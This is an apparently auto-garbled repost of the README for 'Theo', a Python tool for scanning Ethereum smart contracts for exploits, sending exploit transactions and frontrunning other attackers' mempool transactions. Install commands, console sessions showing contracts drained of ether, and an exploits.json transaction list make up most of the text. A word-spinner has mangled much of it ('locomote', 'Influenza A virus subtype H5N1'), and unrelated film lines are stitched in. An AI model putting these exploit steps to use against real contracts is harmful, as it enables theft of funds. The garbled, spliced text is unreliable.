Theo - Ethereum Recon Together With Exploitation Tool


Theo aims to locomote an exploitation framework in addition to a blockchain recon in addition to interaction tool.

Features:
  • Automatic smart contract scanning which generates a listing of possible exploits.
  • Sending transactions to exploit a smart contract.
  • Transaction puddle monitor.
  • Web3 console
  • Frontrunning in addition to backrunning transactions.
  • Waiting for a listing of transactions in addition to sending out others.
  • Estimating gas for transactions way exclusively successful transactions are sent.
  • Disabling gas estimation volition post transactions amongst a fixed gas quantity.
He knows Karl from work.
Theo's role is to struggle script kiddies that drive to locomote leet hackers. He tin brain to them trying to exploit his honeypots in addition to brand them lose their funds, for his ain gain.
"You didn't convey me along for my charming personality."

Install
Theo is available equally a PyPI package:
$ pip install theo $ theo --help usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]             [--account-pk ACCOUNT_PK] [--contract ADDRESS]             [--skip-mythril SKIP_MYTHRIL] [--load-file LOAD_FILE] [--version]  Monitor contracts for residuum changes or tx pool.  optional arguments:   -h, --help            present this assistance message in addition to larn out   --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:                         http://127.0.0.1:8545)   --account-pk ACCOUNT_PK                         The account's individual substitution (default: None)   --contract ADDRESS    Contract to monitor (default: None)   --skip-mythril SKIP_MYTHRIL                         Don't drive to discovery exploits amongst Mythril (default:                         False)   --load-file LOAD_FILE                         Load exploit from file (default: )   --version             present program's version numb   er in addition to larn out  RPC connections:   --rpc-ws RPC_WS       Connect to this WebSockets RPC (default: None)   --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)
Install from sources
$ git clone https://github.com/cleanunicorn/theo $ cd theo $ virtualenv ./venv $ . ./venv/bin/activate $ pip install -r requirements.txt $ pip install -e . $ theo --help
Requirements:
  • Python 3.5 or higher.
  • An Ethereum node amongst RPC available. Ganache industrial plant actually good for testing or for validating exploits.

Demos

Find exploit in addition to execute it
Scan a smart contract, discovery exploits, exploit it:
  • Start Ganache equally our local Ethereum node
  • Deploy the vulnerable contract (happens inwards a unlike window)
  • Scan for exploits
  • Run exploit


Frontrun victim
Setup a honeypot, deploy honeypot, hold off for attacker, frontrun:
  • Start geth equally our local Ethereum node
  • Start mining
  • Deploy the honeypot
  • Start Theo in addition to scan the mem puddle for transactions
  • Frontrun the assaulter in addition to bag his ether


Usage

Help screen
It's a proficient sentiment to banking venture tally the assistance concealment first.
$ theo --help usage: theo [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS] [--rpc-ipc RPC_IPC]             [--account-pk ACCOUNT_PK] [--contract ADDRESS] [--skip-mythril]             [--load-file LOAD_FILE] [--version]  Monitor contracts for residuum changes or tx pool.  optional arguments:   -h, --help            present this assistance message in addition to larn out   --rpc-http RPC_HTTP   Connect to this HTTP RPC (default:                         http://127.0.0.1:8545)   --account-pk ACCOUNT_PK                         The account's individual substitution (default: None)   --contract ADDRESS    Contract to interact amongst (default: None)   --skip-mythril        Skip scanning the contract amongst Mythril (default:                         False)   --load-file LOAD_FILE                         Load exploit from file (default: )   --version             present program's version set out in addition to larn out  RPC connections:   --rpc-ws RPC_WS          Connect to this WebSockets RPC (default: None)   --rpc-ipc RPC_IPC     Connect to this IPC RPC (default: None)

Symbolic execution
Influenza A virus subtype H5N1 listing of exploits is automatically identified using mythril.
Start a session past times running:
$ theo --contract= --account-pk= Scanning for exploits inwards contract: 0xa586074fa4fe3e546a132a16238abe37951d41fe Connecting to HTTP: http://127.0.0.1:8545. Found exploits(s):  [Exploit: (txs=[Transaction {Data: 0xcf7a8965, Value: 1000000000000000000}])]  Influenza A virus subtype H5N1 few objects are available inwards the console: - `exploits` is an array of loaded exploits constitute past times Mythril or read from a file - `w3` an initialized illustration of web3py for the provided HTTP RPC endpoint  Check the readme for to a greater extent than info: https://github.com/cleanunicorn/theo  >>> 
It volition analyze the contract in addition to volition discovery a listing of available exploits.
You tin run into the available exploits found. In this illustration i exploit was found. Each exploit is an Exploit object.
>>> exploits[0] Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])

Running exploits
The exploit steps tin locomote run past times calling .execute() on the exploit object. The transactions volition locomote signed in addition to sent to the node you're connected to.
>>> exploits[0].execute() 2019-07-22 11:26:12,196 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': 1, 'gas': 30521, 'value': 1000000000000000000, 'data': '0xcf7a8965', 'nonce': 47}  2019-07-22 11:26:12,200 - Waiting for 0x41b489c78f654cab0b0451fc573010ddb20ee6437cdbf5098b6b03ee1936c33c to locomote mined...  2019-07-22 11:26:16,337 - Mined  2019-07-22 11:26:16,341 - Initial balance:      1155999450759997797167 (1156.00 ether)  2019-07-22 11:26:16,342 - Final balance:        1156999450759997768901 (1157.00 ether) 

Frontrunning
You tin start the frontrunning monitor to brain for other hackers trying to exploit the honeypot.
Use .frontrun() to start listening for the exploit in addition to when found, post a transaction amongst a higher gas price.
>>> exploits[0].frontrun() 2019-07-22 11:22:26,285 - Scanning the mem puddle for transactions...  2019-07-22 11:22:45,369 - Found tx: 0xf6041abe6e547cea93e80a451fdf53e6bdae67820244246fde44098f91ce1c20  2019-07-22 11:22:45,375 - Sending tx: {'to': '0xA586074FA4Fe3E546A132a16238abe37951D41fE', 'gasPrice': '0x2', 'data': '0xcf7a8965', 'gas': 30522, 'value': 1000000000000000000, 'nonce': 45}  2019-07-22 11:22:45,380 - Waiting for 0xa73316daf806e7eef83d09e467c32ce5faa239c6eda3a270a8ce7a7aae48fb7e to locomote mined...  2019-07-22 11:22:56,852 - Mined 
"Oh, my God! The quarterback is toast!"
This industrial plant really good for about particularly crafted contracts or another vulnerable contracts, equally long equally y'all brand certain frontrunning is inwards your favor.

Load transactions from file
Instead of identifying the exploits amongst mythril, y'all tin specify the listing of exploits yourself.
Create a file that looks similar this exploits.json:
[     [         {             "name": "claimOwnership()",             "input": "0x4e71e0c8",             "value": "0xde0b6b3a7640000"         },         {             "name": "retrieve()",             "input": "0x2e64cec1",             "value": "0x0"         }     ],     [         {             "name": "claimOwnership()",             "input": "0x4e71e0c8",             "value": "0xde0b6b3a7640000"         }     ] ]
This i defines ii exploits, the starting fourth dimension i has ii transactions in addition to the minute i exclusively has 1 transaction.
You tin charge it with:
$ theo --load-file=./exploits.json

Troubleshooting

openssl/aes.h: No such file or directory
If y'all larn this error, y'all remove the libssl source libraries:
    scrypt-1.2.1/libcperciva/crypto/crypto_aes.c:6:10: fatal error: openssl/aes.h: No such file or directory      #include                ^                   compilation terminated.     error: ascendency 'x86_64-linux-gnu-gcc' failed amongst larn out condition 1          ---------------------------------------- Command "/usr/bin/python3 -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-5rl4ep94/scrypt/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-mnbzx9qe-record/install-record.txt --single-version-externally-managed --compile" failed amongst mistake code 1 inwards /tmp/pip-build-5rl4ep94/scrypt/
On Ubuntu y'all tin install them with:
$ sudo apt install libssl-dev